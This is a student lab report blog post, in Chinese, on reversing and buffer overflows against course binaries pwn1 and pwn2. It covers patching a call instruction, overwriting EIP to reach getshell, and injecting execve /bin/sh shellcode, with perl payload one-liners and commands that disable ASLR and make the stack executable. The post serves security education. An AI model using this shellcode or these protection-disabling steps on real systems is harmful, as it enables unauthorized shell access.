20155216 实验一 逆向与Bof基础

实验一 逆向与Bof基础

一、直接修改程序机器指令,改变程序执行流程

使用 objdump -d pwn1 对pwn1文件进行反汇编。

可知main函数跳转至foo函数,先要使main函数跳转至getshell函数,即修改返回地址。

首先使用vi查看器查看pwn1文件,并使用 %!xxd 转换为十六进制查看:

利用 “:e8 d7”查找到需要修改的目标;

将“e8 d7”改为“e8 c3”。

使用 %!xxd -r将文件转换回原文件,保存退出后,再次反汇编进行查看。

此时,main函数返回地址被修改至getshell函数。

二、通过构造输入参数,造成BOF攻击,改变程序执行流

先使用gdb对pwn2文件进行调试:

接下来对函数进行输入数据的测试,意图找到eip中存在4位数。

输入测试数据“1111111122222222333333334444444455555555”,并使用 info r 查看堆栈指令:

此时,eip中存放的是35353535,35是5的ascii码值。

再次输入测试数据“1111111122222222333333334444444412345678”,并使用 info r 查看:

此时eip中存放34333231,即4321。

使用 perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input 进行输入,再使用 xxd input 查看文件的十六进制:

三、注入Shellcode并执行

首先先做实验准备,先利用 apt-get install execstack 下载··execstack··。

输入命令:

execstack -s pwn1    //设置堆栈可执行
execstack -q pwn1    //查询文件的堆栈是否可执行
more /proc/sys/kernel/randomize_va_space 
echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
more /proc/sys/kernel/randomize_va_space 

构造输入: perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode

其中,\x4\x3\x2\x1为溢出到eip的部分,也就是要修改为shellcode的首地址。

输入 (cat input_shellcode;cat) | ./pwn2 ,运行pwn2,然后打开顶一个终端,输入 ps -ef | grep pwn2 找到pwn2的进程号

利用进程号进入gdb调试:

输入 disassemble foo 查看foo的栈地址:

输入 break *0x080484a5 设置断点,并continue。

然后输入info r,查看栈的地址;

然后输入x/32x 0xffffd35c,并不断修改范围,寻找01020304;

之后在01020304的地址上加4,即d3 5c加4,使其覆盖之后的返回地址。

即填充 perl -e 'print "A" x 32;print "\x60\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode 指令。

至此,覆盖成功。

实验成功。

posted @ 2018-03-13 21:32  Lee.X  阅读(213)  评论(0编辑  收藏  举报